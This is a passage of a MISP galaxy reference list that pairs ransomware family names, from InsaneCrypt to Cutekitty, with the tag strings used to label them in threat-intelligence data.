The tag is: misp-galaxy:ransomware="InsaneCrypt"

IPA
ransomware
The tag is: misp-galaxy:ransomware="IPA"

IT.Books
ransomware
The tag is: misp-galaxy:ransomware="IT.Books"

J-
ransomware
The tag is: misp-galaxy:ransomware="J-

JabaCrypter
ransomware
The tag is: misp-galaxy:ransomware="JabaCrypter"

Jaffe
ransomware
The tag is: misp-galaxy:ransomware="Jaffe"

James
ransomware
The tag is: misp-galaxy:ransomware="James"

Java NotDharma
ransomware
The tag is: misp-galaxy:ransomware="Java NotDharma"
jCandy
ransomware
The tag is: misp-galaxy:ransomware="jCandy"

JeepersCrypt
ransomware
The tag is: misp-galaxy:ransomware="JeepersCrypt"

Jemd
ransomware
The tag is: misp-galaxy:ransomware="Jemd"

JesusCrypt
ransomware
The tag is: misp-galaxy:ransomware="JesusCrypt"

JNEC.a
ransomware
The tag is: misp-galaxy:ransomware="JNEC.a"

JoeGo
ransomware
The tag is: misp-galaxy:ransomware="JoeGo"

Jolly Roger
ransomware
The tag is: misp-galaxy:ransomware="Jolly Roger"

JosepCrypt
ransomware
The tag is: misp-galaxy:ransomware="JosepCrypt"
Juwon

ransomware

The tag is: misp-galaxy:ransomware="Juwon"

Kali

ransomware

The tag is: misp-galaxy:ransomware="Kali"

Kamil

ransomware

The tag is: misp-galaxy:ransomware="Kamil"

Kampret

ransomware

The tag is: misp-galaxy:ransomware="Kampret"

Karo

ransomware

The tag is: misp-galaxy:ransomware="Karo"

Katafrank

ransomware

The tag is: misp-galaxy:ransomware="Katafrank"

Katyusha

ransomware

The tag is: misp-galaxy:ransomware="Katyusha"

KCTF Locker

ransomware

The tag is: misp-galaxy:ransomware="KCTF Locker"
KCW
ransomware
The tag is: misp-galaxy:ransomware="KCW"

Kee
ransomware
The tag is: misp-galaxy:ransomware="Kee"

KEKW
ransomware
The tag is: misp-galaxy:ransomware="KEKW"

Kerkoperta
ransomware
The tag is: misp-galaxy:ransomware="Kerkoperta"

KeyMaker
ransomware
The tag is: misp-galaxy:ransomware="KeyMaker"

KillBot_Virus
ransomware
The tag is: misp-galaxy:ransomware="KillBot_Virus"

KillDisk-Dimens
ransomware
The tag is: misp-galaxy:ransomware="KillDisk-Dimens"

KillRabbit
ransomware
The tag is: misp-galaxy:ransomware="KillRabbit"
KillSwitch
ransomware
The tag is: misp-galaxy:ransomware="KillSwitch"

Kindest
ransomware
The tag is: misp-galaxy:ransomware="Kindest"

KKK
ransomware
The tag is: misp-galaxy:ransomware="KKK"

Kovter
ransomware
The tag is: misp-galaxy:ransomware="Kovter"

Kriptovor
ransomware
The tag is: misp-galaxy:ransomware="Kriptovor"

Krypte
ransomware
The tag is: misp-galaxy:ransomware="Krypte"

Krypton
ransomware
The tag is: misp-galaxy:ransomware="Krypton"

Kryptonite RBY
ransomware
The tag is: misp-galaxy:ransomware="Kryptonite RBY"
**Kryptonite Snake**

ransomware

The tag is: `misp-galaxy:ransomware="Kryptonite Snake"`

**Kupidon**

ransomware

The tag is: `misp-galaxy:ransomware="Kupidon"`

**Ladon**

ransomware

The tag is: `misp-galaxy:ransomware="Ladon"`

**Lalabitch_ransomware**

ransomware

The tag is: `misp-galaxy:ransomware="Lalabitch_ransomware"`

**LazagneCrypt**

ransomware

The tag is: `misp-galaxy:ransomware="LazagneCrypt"`

**Light**

ransomware

The tag is: `misp-galaxy:ransomware="Light"`

**LightningCrypt**

ransomware

The tag is: `misp-galaxy:ransomware="LightningCrypt"`

**LIGMA**

ransomware

The tag is: `misp-galaxy:ransomware="LIGMA"`
Lime

ransomware

The tag is: misp-galaxy:ransomware="Lime"

Litra

ransomware

The tag is: misp-galaxy:ransomware="Litra"

LittleFinger

ransomware

The tag is: misp-galaxy:ransomware="LittleFinger"

LMAOxUS

ransomware

The tag is: misp-galaxy:ransomware="LMAOxUS"

LockBox

ransomware

The tag is: misp-galaxy:ransomware="LockBox"

Locked_File

ransomware

The tag is: misp-galaxy:ransomware="Locked_File"

LockedByte

ransomware

The tag is: misp-galaxy:ransomware="LockedByte"

Locker-Pay

ransomware

The tag is: misp-galaxy:ransomware="Locker-Pay"
Lockify
ransomware
The tag is: `misp-galaxy:ransomware="Lockify"`

LockMe
ransomware
The tag is: `misp-galaxy:ransomware="LockMe"`

LockOn
ransomware
The tag is: `misp-galaxy:ransomware="LockOn"`

Lockout
ransomware
The tag is: `misp-galaxy:ransomware="Lockout"`

LongTermMemoryLoss
ransomware
The tag is: `misp-galaxy:ransomware="LongTermMemoryLoss"`

LonleyCrypt
ransomware
The tag is: `misp-galaxy:ransomware="LonleyCrypt"`

LooCipher
ransomware
The tag is: `misp-galaxy:ransomware="LooCipher"`

LordOfShadow
ransomware
The tag is: `misp-galaxy:ransomware="LordOfShadow"`
Losers
ransomware
The tag is: misp-galaxy:ransomware="Losers"

Losers-Dangerous
ransomware
The tag is: misp-galaxy:ransomware="Losers-Dangerous"

Lost_Files
ransomware
The tag is: misp-galaxy:ransomware="Lost_Files"

LuckyJoe
ransomware
The tag is: misp-galaxy:ransomware="LuckyJoe"

Luxnut
ransomware
The tag is: misp-galaxy:ransomware="Luxnut"

Madafakah
ransomware
The tag is: misp-galaxy:ransomware="Madafakah"

MadBit
ransomware
The tag is: misp-galaxy:ransomware="MadBit"

Magician
ransomware
The tag is: misp-galaxy:ransomware="Magician"
Malabu
ransomware

The tag is: misp-galaxy:ransomware="Malabu"

MalwareTech’s CTF
ransomware

The tag is: misp-galaxy:ransomware="MalwareTech’s CTF"

Mancros+AI4939
ransomware

The tag is: misp-galaxy:ransomware="Mancros+AI4939"

Maoloa
ransomware

The tag is: misp-galaxy:ransomware="Maoloa"

Marozka
ransomware

The tag is: misp-galaxy:ransomware="Marozka"

MarraCrypt
ransomware

The tag is: misp-galaxy:ransomware="MarraCrypt"

Matroska
ransomware

The tag is: misp-galaxy:ransomware="Matroska"

MauriGo
ransomware

The tag is: misp-galaxy:ransomware="MauriGo"
MaxiCrypt
ransomware
The tag is: misp-galaxy:ransomware="MaxiCrypt"

Maykolin
ransomware
The tag is: misp-galaxy:ransomware="Maykolin"

Maysomware
ransomware
The tag is: misp-galaxy:ransomware="Maysomware"

MBR-ONI
ransomware
The tag is: misp-galaxy:ransomware="MBR-ONI"

MedusaLocker
ransomware
The tag is: misp-galaxy:ransomware="MedusaLocker"

Meduza
ransomware
The tag is: misp-galaxy:ransomware="Meduza"

MegaLocker
ransomware
The tag is: misp-galaxy:ransomware="MegaLocker"

Mew767
ransomware
The tag is: misp-galaxy:ransomware="Mew767"
Mike NotSTOP

ransomware

The tag is: misp-galaxy:ransomware="Mike NotSTOP"

Mikoyan

ransomware

The tag is: misp-galaxy:ransomware="Mikoyan"

MindLost

ransomware

The tag is: misp-galaxy:ransomware="MindLost"

MindSystem

ransomware

The tag is: misp-galaxy:ransomware="MindSystem"

Mini

ransomware

The tag is: misp-galaxy:ransomware="Mini"

Minotaur

ransomware

The tag is: misp-galaxy:ransomware="Minotaur"

MMM

ransomware

The tag is: misp-galaxy:ransomware="MMM"

MNS CryptoLocker

ransomware

The tag is: misp-galaxy:ransomware="MNS CryptoLocker"
MoneroPay
ransomware
The tag is: misp-galaxy:ransomware="MoneroPay"

MongoLock
ransomware
The tag is: misp-galaxy:ransomware="MongoLock"

MoonCryptor
ransomware
The tag is: misp-galaxy:ransomware="MoonCryptor"

Mordor
ransomware
The tag is: misp-galaxy:ransomware="Mordor"

MorrisBatchCrypt
ransomware
The tag is: misp-galaxy:ransomware="MorrisBatchCrypt"

Moth
ransomware
The tag is: misp-galaxy:ransomware="Moth"

MoWare H.F.D
ransomware
The tag is: misp-galaxy:ransomware="MoWare H.F.D"

Mr.Locker
ransomware
The tag is: misp-galaxy:ransomware="Mr.Locker"
Mr403Forbidden

ransomware

The tag is: misp-galaxy:ransomware="Mr403Forbidden"

MuchLove

ransomware

The tag is: misp-galaxy:ransomware="MuchLove"

Muhstik

ransomware

The tag is: misp-galaxy:ransomware="Muhstik"

Mystic

ransomware

The tag is: misp-galaxy:ransomware="Mystic"

MZP

ransomware

The tag is: misp-galaxy:ransomware="MZP"

N2019cov

ransomware

The tag is: misp-galaxy:ransomware="N2019cov"

Naampa

ransomware

The tag is: misp-galaxy:ransomware="Naampa"

NazCrypt

ransomware

The tag is: misp-galaxy:ransomware="NazCrypt"
Nefilim
ransomware
The tag is: misp-galaxy:ransomware="Nefilim"

Negozl
ransomware
The tag is: misp-galaxy:ransomware="Negozl"

Neitrino
ransomware
The tag is: misp-galaxy:ransomware="Neitrino"

NewWave
ransomware
The tag is: misp-galaxy:ransomware="NewWave"

NextCry
ransomware
The tag is: misp-galaxy:ransomware="NextCry"

Nightmare
ransomware
The tag is: misp-galaxy:ransomware="Nightmare"

NinjaLoc
ransomware
The tag is: misp-galaxy:ransomware="NinjaLoc"

NM4
ransomware
The tag is: misp-galaxy:ransomware="NM4"
Noblis
ransomware
The tag is: misp-galaxy:ransomware="Noblis"

Nog4yH4n
ransomware
The tag is: misp-galaxy:ransomware="Nog4yH4n"

Nomikon
ransomware
The tag is: misp-galaxy:ransomware="Nomikon"

NotAHero
ransomware
The tag is: misp-galaxy:ransomware="NotAHero"

Nozelesn
ransomware
The tag is: misp-galaxy:ransomware="Nozelesn"

Nulltica
ransomware
The tag is: misp-galaxy:ransomware="Nulltica"

Nx / OSR
ransomware
The tag is: misp-galaxy:ransomware="Nx / OSR"

Nyton
ransomware
The tag is: misp-galaxy:ransomware="Nyton"
NZMR

ransomware

The tag is: misp-galaxy:ransomware="NZMR"

Ogre

ransomware

The tag is: misp-galaxy:ransomware="Ogre"

OhNo!

ransomware

The tag is: misp-galaxy:ransomware="OhNo!"

Oled

ransomware

The tag is: misp-galaxy:ransomware="Oled"

OmniSphere

ransomware

The tag is: misp-galaxy:ransomware="OmniSphere"

One

ransomware

The tag is: misp-galaxy:ransomware="One"

ONI

ransomware

The tag is: misp-galaxy:ransomware="ONI"

OoPS Ramenware

ransomware

The tag is: misp-galaxy:ransomware="OoPS Ramenware"
OopsLocker
ransomware
The tag is: misp-galaxy:ransomware="OopsLocker"

OPdailyallowance
ransomware
The tag is: misp-galaxy:ransomware="OPdailyallowance"

OpenToYou
ransomware
The tag is: misp-galaxy:ransomware="OpenToYou"

Ordinal
ransomware
The tag is: misp-galaxy:ransomware="Ordinal"

Ordinypt
ransomware
The tag is: misp-galaxy:ransomware="Ordinypt"

Pacman
ransomware
The tag is: misp-galaxy:ransomware="Pacman"

PassLock
ransomware
The tag is: misp-galaxy:ransomware="PassLock"

Pay-or-Lost
ransomware
The tag is: misp-galaxy:ransomware="Pay-or-Lost"
PayForNature

ransomware

The tag is: misp-galaxy:ransomware="PayForNature"

Paymen45

ransomware

The tag is: misp-galaxy:ransomware="Paymen45"

Payment

ransomware

The tag is: misp-galaxy:ransomware="Payment"

PClock и PClock2

ransomware

The tag is: misp-galaxy:ransomware="PClock и PClock2"

PPDDDP

ransomware

The tag is: misp-galaxy:ransomware="PPDDDP"

PEC 2017

ransomware

The tag is: misp-galaxy:ransomware="PEC 2017"

Pendor

ransomware

The tag is: misp-galaxy:ransomware="Pendor"

Pennywise

ransomware

The tag is: misp-galaxy:ransomware="Pennywise"
**PewCrypt** +decrypt
ransomware
The tag is: `misp-galaxy:ransomware="PewCrypt +decrypt"`

**PewDiePie**
ransomware
The tag is: `misp-galaxy:ransomware="PewDiePie"`

**PhobosImposter**
ransomware
The tag is: `misp-galaxy:ransomware="PhobosImposter"`

**PhoneNumber**
ransomware
The tag is: `misp-galaxy:ransomware="PhoneNumber"`

**PHP**
ransomware
The tag is: `misp-galaxy:ransomware="PHP"`

**Pirateware**
ransomware
The tag is: `misp-galaxy:ransomware="Pirateware"`

**PoisonFang**
ransomware
The tag is: `misp-galaxy:ransomware="PoisonFang"`

**PonyFinal**
ransomware
The tag is: `misp-galaxy:ransomware="PonyFinal"`
PooleZoor
ransomware
The tag is: misp-galaxy:ransomware="PooleZoor"

PopCornTime
ransomware
The tag is: misp-galaxy:ransomware="PopCornTime"

PowerHentai
ransomware
The tag is: misp-galaxy:ransomware="PowerHentai"

PowerLocky
ransomware
The tag is: misp-galaxy:ransomware="PowerLocky"

PowerShell Locker 2013
ransomware
The tag is: misp-galaxy:ransomware="PowerShell Locker 2013"

PowerShell Locker 2015
ransomware
The tag is: misp-galaxy:ransomware="PowerShell Locker 2015"

Pr0tector
ransomware
The tag is: misp-galaxy:ransomware="Pr0tector"

Predator
ransomware
The tag is: misp-galaxy:ransomware="Predator"
Priapos
ransomware
The tag is: misp-galaxy:ransomware="Priapos"

Project23
ransomware
The tag is: misp-galaxy:ransomware="Project23"

Project57
ransomware
The tag is: misp-galaxy:ransomware="Project57"

ProLock
ransomware
The tag is: misp-galaxy:ransomware="ProLock"

Prometey
ransomware
The tag is: misp-galaxy:ransomware="Prometey"

Protected
ransomware
The tag is: misp-galaxy:ransomware="Protected"

PSCrypt
ransomware
The tag is: misp-galaxy:ransomware="PSCrypt"

PshCrypt
ransomware
The tag is: misp-galaxy:ransomware="PshCrypt"
PTP
ransomware
The tag is: misp-galaxy:ransomware="PTP"

Pulpy
ransomware
The tag is: misp-galaxy:ransomware="Pulpy"

PureLocker
ransomware
The tag is: misp-galaxy:ransomware="PureLocker"

PwndLocker
ransomware
The tag is: misp-galaxy:ransomware="PwndLocker"

PyteHole
ransomware
The tag is: misp-galaxy:ransomware="PyteHole"

Python
ransomware
The tag is: misp-galaxy:ransomware="Python"

PZDC
ransomware
The tag is: misp-galaxy:ransomware="PZDC"

Qinynore
ransomware
The tag is: misp-galaxy:ransomware="Qinynore"
QNAPCrypt
ransomware
The tag is: misp-galaxy:ransomware="QNAPCrypt"

QP
ransomware
The tag is: misp-galaxy:ransomware="QP"

QuakeWay
ransomware
The tag is: misp-galaxy:ransomware="QuakeWay"

Qweuirtksd
ransomware
The tag is: misp-galaxy:ransomware="Qweuirtksd"

R3store
ransomware
The tag is: misp-galaxy:ransomware="R3store"

RabbitFox
ransomware
The tag is: misp-galaxy:ransomware="RabbitFox"

Ramsey
ransomware
The tag is: misp-galaxy:ransomware="Ramsey"

RandomLocker
ransomware
The tag is: misp-galaxy:ransomware="RandomLocker"
RanRans

ransomware

The tag is: misp-galaxy:ransomware="RanRans"

Rans0mLocked

ransomware

The tag is: misp-galaxy:ransomware="Rans0mLocked"

Ransed

ransomware

The tag is: misp-galaxy:ransomware="Ransed"

Ransom102

ransomware

The tag is: misp-galaxy:ransomware="Ransom102"

RansomAES

ransomware

The tag is: misp-galaxy:ransomware="RansomAES"

RansomCuck

ransomware

The tag is: misp-galaxy:ransomware="RansomCuck"

RansomMine

ransomware

The tag is: misp-galaxy:ransomware="RansomMine"

Ransomnix

ransomware

The tag is: misp-galaxy:ransomware="Ransomnix"
Ransom Prank
ransomware
The tag is: misp-galaxy:ransomware="Ransom Prank"

RansomUserLocker
ransomware
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RansomWarrior
ransomware
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Rapid
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Rapid 2.0
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Rapid 3.0
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Rapid-Gillette
ransomware
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Ra
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RaRuCrypt

ransomware

The tag is: misp-galaxy:ransomware="RaRuCrypt"

RedBoot

ransomware

The tag is: misp-galaxy:ransomware="RedBoot"

Redkeeper

ransomware

The tag is: misp-galaxy:ransomware="Redkeeper"

RedFox

ransomware

The tag is: misp-galaxy:ransomware="RedFox"

RedRum

ransomware

The tag is: misp-galaxy:ransomware="RedRum"

Redshot

ransomware

The tag is: misp-galaxy:ransomware="Redshot"

Reetner

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RekenSom

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Relock

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RensenWare

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Rentyr

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RestoLocker

ransomware

The tag is: misp-galaxy:ransomware="RestoLocker"

Resurrection

ransomware

The tag is: misp-galaxy:ransomware="Resurrection"

Retis

ransomware

The tag is: misp-galaxy:ransomware="Retis"

RetMyData

ransomware

The tag is: misp-galaxy:ransomware="RetMyData"

Revolution

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The tag is: misp-galaxy:ransomware="Revolution"
Reyptson

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Rhino

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Rijndael

ransomware

The tag is: misp-galaxy:ransomware="Rijndael"

Rogue HT

ransomware

The tag is: misp-galaxy:ransomware="Rogue HT"

Rontok

ransomware

The tag is: misp-galaxy:ransomware="Rontok"

Rozlok

ransomware

The tag is: misp-galaxy:ransomware="Rozlok"

RSA-NI

ransomware

The tag is: misp-galaxy:ransomware="RSA-NI"

RSA2048Pro

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Ruby
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Rush
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Russenger
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Russian EDA2
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SAD
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SadComputer
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Sadogo
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Salsa
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Santa Encryptor
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Saramat
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SARansom
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Satan Cryptor 2.0
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Satan’s Doom Crypter
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SatanCryptor Go
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Saturn
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Satyr
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SaveTheQueen

ransomware

The tag is: misp-galaxy:ransomware="SaveTheQueen"

ScammerLocker HT

ransomware

The tag is: misp-galaxy:ransomware="ScammerLocker HT"

ScammerLocker Ph

ransomware

The tag is: misp-galaxy:ransomware="ScammerLocker Ph"

Schwerer

ransomware

The tag is: misp-galaxy:ransomware="Schwerer"

ScorpionLocker

ransomware

The tag is: misp-galaxy:ransomware="ScorpionLocker"

Scrabber

ransomware

The tag is: misp-galaxy:ransomware="Scrabber"

Scroboscope

ransomware

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SecretSystem

ransomware

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SecureCryptor
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SeginChile
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SEND.ID.TO
ransomware
The tag is: misp-galaxy:ransomware="SEND.ID.TO"

Seon
ransomware
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Sepsis
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SepSys
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Shadi
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ShadowCryptor
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ShinigamiLocker

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The tag is: `misp-galaxy:ransomware="ShinigamiLocker"`

ShkolotaCrypt

ransomware

The tag is: `misp-galaxy:ransomware="ShkolotaCrypt"`

Shrug

ransomware

The tag is: `misp-galaxy:ransomware="Shrug"`

Shutdown57

ransomware

The tag is: `misp-galaxy:ransomware="Shutdown57"`

ShutUpAndDance

ransomware

The tag is: `misp-galaxy:ransomware="ShutUpAndDance"`

Sifreli 2017

ransomware

The tag is: `misp-galaxy:ransomware="Sifreli 2017"`

Sifreli 2019

ransomware

The tag is: `misp-galaxy:ransomware="Sifreli 2019"`

SifreCozucu

ransomware

The tag is: `misp-galaxy:ransomware="SifreCozucu"`
SilentSpring
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SintaLocker
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Skull
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Skull HT
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The tag is: misp-galaxy:ransomware="Skull HT"

SkyStars
ransomware
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SlankCryptor
ransomware
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Snake-Ekans
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SnakeLocker
ransomware
The tag is: misp-galaxy:ransomware="SnakeLocker"
Snatch
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SnowPicnic
ransomware
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SoFucked
ransomware
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SOLO
ransomware
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Somik1
ransomware
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Sorry HT
ransomware
The tag is: misp-galaxy:ransomware="Sorry HT"

SpartCrypt
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Spectre
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Sphinx
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Spiteful Doubletake
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SpongeBob
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StalinLocker
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Stinger
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Storm
ransomware
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StrawHat
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Streamer
ransomware
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Striked ransomware

The tag is: `misp-galaxy:ransomware="Striked"`

Stroman ransomware

The tag is: `misp-galaxy:ransomware="Stroman"`

Stupid ransomware

The tag is: `misp-galaxy:ransomware="Stupid"`

StupidJapan ransomware

The tag is: `misp-galaxy:ransomware="StupidJapan"`

Styver ransomware

The tag is: `misp-galaxy:ransomware="Styver"`

Styx ransomware

The tag is: `misp-galaxy:ransomware="Styx"`

SuperB ransomware

The tag is: `misp-galaxy:ransomware="SuperB"`

SuperCrypt ransomware

The tag is: `misp-galaxy:ransomware="SuperCrypt"`
Suri

ransomware

The tag is: misp-galaxy:ransomware="Suri"

Symbiom

ransomware

The tag is: misp-galaxy:ransomware="Symbiom"

SymmyWare

ransomware

The tag is: misp-galaxy:ransomware="SymmyWare"

Syrk

ransomware

The tag is: misp-galaxy:ransomware="Syrk"

SYSDOWN

ransomware

The tag is: misp-galaxy:ransomware="SYSDOWN"

SystemCrypter

ransomware

The tag is: misp-galaxy:ransomware="SystemCrypter"

T1Happy

ransomware

The tag is: misp-galaxy:ransomware="T1Happy"

Takahiro Locker

ransomware

The tag is: misp-galaxy:ransomware="Takahiro Locker"
TBHRanso

ransomware

The tag is: misp-galaxy:ransomware="TBHRanso"

Teamo

ransomware

The tag is: misp-galaxy:ransomware="Teamo"

Tear Dr0p

ransomware

The tag is: misp-galaxy:ransomware="Tear Dr0p"

Technicy

ransomware

The tag is: misp-galaxy:ransomware="Technicy"

TeslaWare

ransomware

The tag is: misp-galaxy:ransomware="TeslaWare"

TFlower

ransomware

The tag is: misp-galaxy:ransomware="TFlower"

The Brotherhood

ransomware

The tag is: misp-galaxy:ransomware="The Brotherhood"

The Magic

ransomware

The tag is: misp-galaxy:ransomware="The Magic"
TheCursedMurderer

ransomware

The tag is: misp-galaxy:ransomware="TheCursedMurderer"

TheDarkEncryptor

ransomware

The tag is: misp-galaxy:ransomware="TheDarkEncryptor"

Thor

ransomware

The tag is: misp-galaxy:ransomware="Thor"

THT

ransomware

The tag is: misp-galaxy:ransomware="THT"

ThunderCrypt

ransomware

The tag is: misp-galaxy:ransomware="ThunderCrypt"

Tk

ransomware

The tag is: misp-galaxy:ransomware="Tk"

Torchwood

ransomware

The tag is: misp-galaxy:ransomware="Torchwood"

TorLocker

ransomware

The tag is: misp-galaxy:ransomware="TorLocker"
TotalWipeOut
ransomware
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TPS1.0
ransomware
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Trick-Or-Treat
ransomware
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Trojan-Syria
ransomware
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TrumpHead
ransomware
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TurkStatik
ransomware
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Tyrant
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UCCU
ransomware
The tag is: misp-galaxy:ransomware="UCCU"
Ukash

ransomware

The tag is: misp-galaxy:ransomware="Ukash"

Ultimo HT

ransomware

The tag is: misp-galaxy:ransomware="Ultimo HT"

UltraCrypter

ransomware

The tag is: misp-galaxy:ransomware="UltraCrypter"

Unikey

ransomware

The tag is: misp-galaxy:ransomware="Unikey"

Unknown Crypted

ransomware

The tag is: misp-galaxy:ransomware="Unknown Crypted"

Unknown Lock

ransomware

The tag is: misp-galaxy:ransomware="Unknown Lock"

Unknown Xtbl

ransomware

The tag is: misp-galaxy:ransomware="Unknown Xtbl"

Unlckr

ransomware

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UNNAM3D

ransomware

The tag is: misp-galaxy:ransomware="UNNAM3D"

Unnamed Bin

ransomware

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Unrans

ransomware

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UselessDisk

ransomware

The tag is: misp-galaxy:ransomware="UselessDisk"

UselessFiles

ransomware

The tag is: misp-galaxy:ransomware="UselessFiles"

USR0

ransomware

The tag is: misp-galaxy:ransomware="USR0"

Vaca

ransomware

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VCrypt

ransomware

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vCryp1
ransomware
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VegaLocker
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Velso
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Vendetta
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VevoLocker
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VHD
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ViACrypt
ransomware
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Viagra
ransomware
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**VideoBelle**

ransomware

The tag is: `misp-galaxy:ransomware="VideoBelle"`

**ViiperWare**

ransomware

The tag is: `misp-galaxy:ransomware="ViiperWare"`

**Viro**

ransomware

The tag is: `misp-galaxy:ransomware="Viro"`

**ViroBotnet**

ransomware

The tag is: `misp-galaxy:ransomware="ViroBotnet"`

**VisionCrypt**

ransomware

The tag is: `misp-galaxy:ransomware="VisionCrypt"`

**VMola**

ransomware

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**VoidCrypt**

ransomware

The tag is: `misp-galaxy:ransomware="VoidCrypt"`

**Vulston**

ransomware

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Waffle

ransomware

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Waiting

ransomware

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Waldo

ransomware

The tag is: misp-galaxy:ransomware="Waldo"

Wanna Decryptor Portuguese

ransomware

The tag is: misp-galaxy:ransomware="Wanna Decryptor Portuguese"

WannabeHappy

ransomware

The tag is: misp-galaxy:ransomware="WannabeHappy"

WannaCash

ransomware

The tag is: misp-galaxy:ransomware="WannaCash"

WannaDie

ransomware

The tag is: misp-galaxy:ransomware="WannaDie"

WannaPeace

ransomware

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WinUpdatesDisabler
ransomware
The tag is: misp-galaxy:ransomware="WinUpdatesDisabler"

WTDI
ransomware
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X Locker 5.0
ransomware
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XCry
ransomware
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XD
ransomware
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XData
ransomware
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XeroWare
ransomware
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Xlockr
ransomware
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**XmdXtazX**

ransomware

The tag is: `misp-galaxy:ransomware="XmdXtazX"`

**Xncrypt**

ransomware

The tag is: `misp-galaxy:ransomware="Xncrypt"`

**XRat**

ransomware

The tag is: `misp-galaxy:ransomware="XRat"`

**XyuEncrypt**

ransomware

The tag is: `misp-galaxy:ransomware="XyuEncrypt"`

**xXLecXx**

ransomware

The tag is: `misp-galaxy:ransomware="xXLecXx"`

**Yatron**

ransomware

The tag is: `misp-galaxy:ransomware="Yatron"`

**Yoshikada**

ransomware

The tag is: `misp-galaxy:ransomware="Yoshikada"`

**YYYYBJQOQDU**

ransomware

The tag is: `misp-galaxy:ransomware="YYYYBJQOQDU"`
ZariqaCrypt
ransomware
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Zelta Free
ransomware
The tag is: misp-galaxy:ransomware="Zelta Free"

ZenCrypt
ransomware
The tag is: misp-galaxy:ransomware="ZenCrypt"

Zeoticus
ransomware
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Zeppelin
ransomware
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Zero-Fucks
ransomware
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ZeroLocker
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Zeronine
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ZeroRansom

ransomware

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Zilla

ransomware

The tag is: `misp-galaxy:ransomware="Zilla"`

ZimbraCryptor

ransomware

The tag is: `misp-galaxy:ransomware="ZimbraCryptor"`

ZipLocker

ransomware

The tag is: `misp-galaxy:ransomware="ZipLocker"`

Zipper

ransomware

The tag is: `misp-galaxy:ransomware="Zipper"`

Zoldon

ransomware

The tag is: `misp-galaxy:ransomware="Zoldon"`

ZorgoCry

ransomware

The tag is: `misp-galaxy:ransomware="ZorgoCry"`

Smaug

ransomware

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GammA

ransomware

The tag is: misp-galaxy:ransomware="GammA"

BlackMoon

ransomware

The tag is: misp-galaxy:ransomware="BlackMoon"

MilkmanVictory

ransomware

The tag is: misp-galaxy:ransomware="MilkmanVictory"

Dragoncyber

ransomware

The tag is: misp-galaxy:ransomware="Dragoncyber"

Solider

ransomware

The tag is: misp-galaxy:ransomware="Solider"

Biglock

ransomware

The tag is: misp-galaxy:ransomware="Biglock"

Immuni

ransomware

The tag is: misp-galaxy:ransomware="Immuni"

Black claw

ransomware

The tag is: misp-galaxy:ransomware="Black claw"
**Banks1**
ransomware
The tag is: `misp-galaxy:ransomware="Banks1"`

**UnluckyWare**
ransomware
The tag is: `misp-galaxy:ransomware="UnluckyWare"`

**Zorab**
ransomware
The tag is: `misp-galaxy:ransomware="Zorab"`

**FonixCrypter**
ransomware
The tag is: `misp-galaxy:ransomware="FonixCrypter"`

**LickyAgent**
ransomware
The tag is: `misp-galaxy:ransomware="LickyAgent"`

**Avaddon**
ransomware
The tag is: `misp-galaxy:ransomware="Avaddon"`

**DualShot**
ransomware
The tag is: `misp-galaxy:ransomware="DualShot"`

**RNS**
ransomware
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Such_Crypt
ransomware
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20dfs
ransomware
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CryDroid
ransomware
The tag is: misp-galaxy:ransomware="CryDroid"

TomNom
ransomware
The tag is: misp-galaxy:ransomware="TomNom"

Yogynicof
ransomware
The tag is: misp-galaxy:ransomware="Yogynicof"

CobraLocker
ransomware
The tag is: misp-galaxy:ransomware="CobraLocker"

PL
ransomware
The tag is: misp-galaxy:ransomware="PL"

CryCryptor
ransomware
The tag is: misp-galaxy:ransomware="CryCryptor"
Blocky

ransomware

The tag is: `misp-galaxy:ransomware="Blocky"`

OhNo-FakePDF

ransomware

The tag is: `misp-galaxy:ransomware="OhNo-FakePDF"`

Try2Cry

ransomware

The tag is: `misp-galaxy:ransomware="Try2Cry"`

LolKek

ransomware

The tag is: `misp-galaxy:ransomware="LolKek"`

FlowEncrypt

ransomware

The tag is: `misp-galaxy:ransomware="FlowEncrypt"`

WhoLocker

ransomware

The tag is: `misp-galaxy:ransomware="WhoLocker"`

Pojie

ransomware

The tag is: `misp-galaxy:ransomware="Pojie"`

Aris Locker

ransomware

The tag is: `misp-galaxy:ransomware="Aris Locker"`
EduRansom

ransomware

The tag is: misp-galaxy:ransomware="EduRansom"

Fastwind

ransomware

The tag is: misp-galaxy:ransomware="Fastwind"

Silvertor

ransomware

The tag is: misp-galaxy:ransomware="Silvertor"

Exorcist

ransomware

The tag is: misp-galaxy:ransomware="Exorcist"

WyvernLocker

ransomware

The tag is: misp-galaxy:ransomware="WyvernLocker"

Ensiko

ransomware

The tag is: misp-galaxy:ransomware="Ensiko"

Django

ransomware

The tag is: misp-galaxy:ransomware="Django"

RansomBlox

ransomware

The tag is: misp-galaxy:ransomware="RansomBlox"
BitRansomware

ransomware

The tag is: misp-galaxy:ransomware="BitRansomware"

AESMew

ransomware

The tag is: misp-galaxy:ransomware="AESMew"

DeathOfShadow

ransomware

The tag is: misp-galaxy:ransomware="DeathOfShadow"

XMRLocker

ransomware

The tag is: misp-galaxy:ransomware="XMRLocker"

WinWord64

ransomware

The tag is: misp-galaxy:ransomware="WinWord64"

ThunderX

ransomware

The tag is: misp-galaxy:ransomware="ThunderX"

Mountlocket

ransomware

The tag is: misp-galaxy:ransomware="Mountlocket"

Gladius

ransomware

The tag is: misp-galaxy:ransomware="Gladius"
Cyrat
ransomware
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Crypt32
ransomware
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BizHack
ransomware
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Geneve
ransomware
The tag is: misp-galaxy:ransomware="Geneve"

Z3
ransomware
The tag is: misp-galaxy:ransomware="Z3"

Leakthemall
ransomware
The tag is: misp-galaxy:ransomware="Leakthemall"

Conti
ransomware
The tag is: misp-galaxy:ransomware="Conti"

Makop
ransomware
The tag is: misp-galaxy:ransomware="Makop"
**Best Crypt**

ransomware

The tag is: `misp-galaxy:ransomware="Best Crypt"`

**Consciousness**

ransomware

The tag is: `misp-galaxy:ransomware="Consciousness"`

**Flamingo**

ransomware

The tag is: `misp-galaxy:ransomware="Flamingo"`

**PewPew**

ransomware

The tag is: `misp-galaxy:ransomware="PewPew"`

**DogeCrypt**

ransomware

The tag is: `misp-galaxy:ransomware="DogeCrypt"`

**Badbeeteam**

ransomware

The tag is: `misp-galaxy:ransomware="Badbeeteam"`

**Solve**

ransomware

The tag is: `misp-galaxy:ransomware="Solve"`

**RenameX12**

ransomware

The tag is: `misp-galaxy:ransomware="RenameX12"`
Zhen
ransomware
The tag is: misp-galaxy:ransomware="Zhen"

Datacloud
ransomware
The tag is: misp-galaxy:ransomware="Datacloud"

Ironcat
ransomware
The tag is: misp-galaxy:ransomware="Ironcat"

Dusk
ransomware
The tag is: misp-galaxy:ransomware="Dusk"

Cutekitty
ransomware
